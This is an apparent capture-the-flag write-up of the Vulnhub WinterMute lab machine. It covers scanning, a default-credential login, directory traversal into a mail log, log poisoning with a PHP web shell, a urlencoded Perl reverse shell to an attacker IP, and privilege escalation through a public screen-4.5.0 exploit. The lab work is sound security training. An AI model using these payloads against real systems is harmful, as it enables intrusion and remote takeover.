Write-up on the Vulnhub WinterMute

We will start with Nmap scan

Nmap –sV –sC 192.168.56.102

We can see the smtp server running at port 25 and the port 3000 which is running hadoop-
datanode. And other port 80 a http services.

Let’s do the directory bruteforce on the HTTP page, by Gobuster.

As we can see we got some 3 folders name manual, freeside and Server-status.

When we open the manual folder we got apache manual, and for the freeside we got nothing, not
even the source code we got anything.

So only thing we left is the port 3000 so we tried to browse it.

When we visit http://192.168.56.102:3000 we are redirected to
http://192.168.56.102:3000/lua/login.lua?referer=/ and we get a login page.

As we can see in the above page there is a hint given that default user and password are admin, so
let’s try will it work.

And we are lucky we were able to login.

On clicking the Flows option, we were redirected to the following page:

Here we observed few directories were listed (as shown in the screenshot above), hence we thought
of appending them to our URL http://192.168.1.124/ OR http://192.168.1.124:3000/ to give a try.

http://192.168.1.124:3000/turing-bolo/ however no success.

Then we browsed the URL http://192.168.1.124/turing-bolo/ and got below page

Click on Submit Query and we are redirected to the following page.

http://192.168.1.124/turing-bolo/bolo.php?bolo=case
From the above screenshot, we can see a few log files (as highlighted). Per our experience, this could
be an indication of Directory traversal where we can execute writeable files in the browser. Hence
let’s try to append ../../../log/mail to the URL in the browser as follows :

http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail
search in Google for “postfix log location” seems to suggest the logs are at /var/log/mail.log. This
plays well into our hands because of the .log extension. Let’s explore this path of attack.

<?php echo shell_exec($_GET['cmd']);?>

Perl reverse shell back to my nc listener at port 1234. The Perl reverse shell is urlencoded to prevent
any complications.

Before urlencoding

perl -e 'use Socket;$i="192.168.30.128";

$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet
_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

After urlencoding

perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.30.128%22%3B%24p
%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp
%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i
%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E
%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-
i%22%29%3B%7D%3B%27

Copy and paste the urlencoded Perl reverse shell after cmd=. And … a shell at last.

Now we got the shell.

Now we will do privilege escalation.

Lets enumerate the system and run the following command.

find / -perm -4000 2>/dev/null

When we searched for the screen-4.5.0 exploit, we found one public exploit.

https://www.exploit-db.com/exploits/41154

After running exploit we got root

Now is the Time to capture the flag.